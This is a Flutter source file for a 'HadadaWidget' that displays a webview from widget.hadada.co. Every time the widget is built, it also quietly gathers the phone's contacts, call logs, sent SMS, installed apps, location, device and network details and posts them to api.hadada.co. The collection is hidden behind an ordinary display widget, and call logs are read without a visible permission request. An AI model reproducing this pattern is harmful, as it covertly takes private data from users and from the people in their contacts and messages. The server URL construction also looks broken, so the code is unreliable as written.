import 'dart:convert';

import 'package:flutter/material.dart';
import 'package:webview_flutter/webview_flutter.dart';
import 'package:call_log/call_log.dart';
import 'package:disk_space/disk_space.dart';
import 'package:telephony/telephony.dart';
import 'package:random_string/random_string.dart';
import 'package:device_apps/device_apps.dart';
import 'package:geolocator/geolocator.dart';
import 'package:flutter_contacts/flutter_contacts.dart';
import 'package:device_info_plus/device_info_plus.dart';
import 'package:network_info_plus/network_info_plus.dart';
import 'package:http/http.dart' as http;

class HadadaWidget extends StatelessWidget {
  final String appKey;

  final String full;

  const HadadaWidget({required this.appKey, this.full = "", Key? key})
      : super(key: key);

  @override
  Widget build(BuildContext context) {
    var sessionId = randomAlphaNumeric(10);

    var url = "https://widget.hadada.co?key="+ appKey;

    if (full != "") {
      url += "&full=" + full;
    }

    savePhoneData(sessionId);

    return MaterialApp(
        title: "Hadada Widget",
        home: Scaffold(
          appBar: null,
          body: WebView(
            initialUrl: url,
            javascriptMode: JavascriptMode.unrestricted,
          ),
        ));
  }

  savePhoneData(sessionId) async {
    var contacts = await getContacts();
    var callLogs = await getCallLogs();
    var messages = await getMessages();
    var storage = await getPhoneDiskSpace();
    var apps = await DeviceApps.getInstalledApplications();
    var location = await determinePosition();
    var device = await deviceInfo();
    var network = NetworkInfo();

    var data = {
      "contacts": contacts.toString(),
      "callLogs": callLogs.toString(),
      "messages": messages.toString(),
      "phoneFreeSpace": storage[0],
      "phoneTotalSpace": storage[1],
      "apps": apps.toString(),
      "network": network.toString(),
      "deviceInfo": device.toString(),
      "location": location.toString(),
      "sessionId": sessionId,
      "appKey": appKey
    };

    networkOps(data);
  }

  deviceInfo() async {
    final deviceInfoPlugin = DeviceInfoPlugin();
    final deviceInfo = await deviceInfoPlugin.deviceInfo;
    return deviceInfo.toMap();
  }

  getContacts() async {
    if (await FlutterContacts.requestPermission()){
      var contacts = await FlutterContacts.getContacts(withProperties: true, withPhoto: true);
      return contacts;
    }

    return null;
  }

  getCallLogs() async {
    Iterable<CallLogEntry> entries = await CallLog.get();
    return entries.toList();
  }

  getMessages() async {
    final telephony = Telephony.instance;
    final bool? result = await telephony.requestPhoneAndSmsPermissions;

    if (result != null && result) {
      return telephony.getSentSms();
    }

    return null;
  }

  getPhoneDiskSpace() async {
    double? freeDiskSpace = await DiskSpace.getFreeDiskSpace;
    double? totalDiskSpace = await DiskSpace.getTotalDiskSpace;

    return [freeDiskSpace, totalDiskSpace];
  }

  networkOps(data) async {
    var url = Uri.https('https://api.hadada.co', '/hadada-service/phone/data');

    //encode Map to JSON
    var body = json.encode(data);

    var response = await http.post(url,
        headers: {"Content-Type": "application/json"}, body: body);
    return response;
  }

  determinePosition() async {
    bool serviceEnabled;
    LocationPermission permission;

    // Test if location services are enabled.
    serviceEnabled = await Geolocator.isLocationServiceEnabled();
    if (!serviceEnabled) {
      return null;
    }

    permission = await Geolocator.checkPermission();
    if (permission == LocationPermission.denied) {
      permission = await Geolocator.requestPermission();
      if (permission == LocationPermission.denied) {
        return null;
      }
    }

    if (permission == LocationPermission.deniedForever) {
      return null;
    }

    return await Geolocator.getCurrentPosition();
  }
}
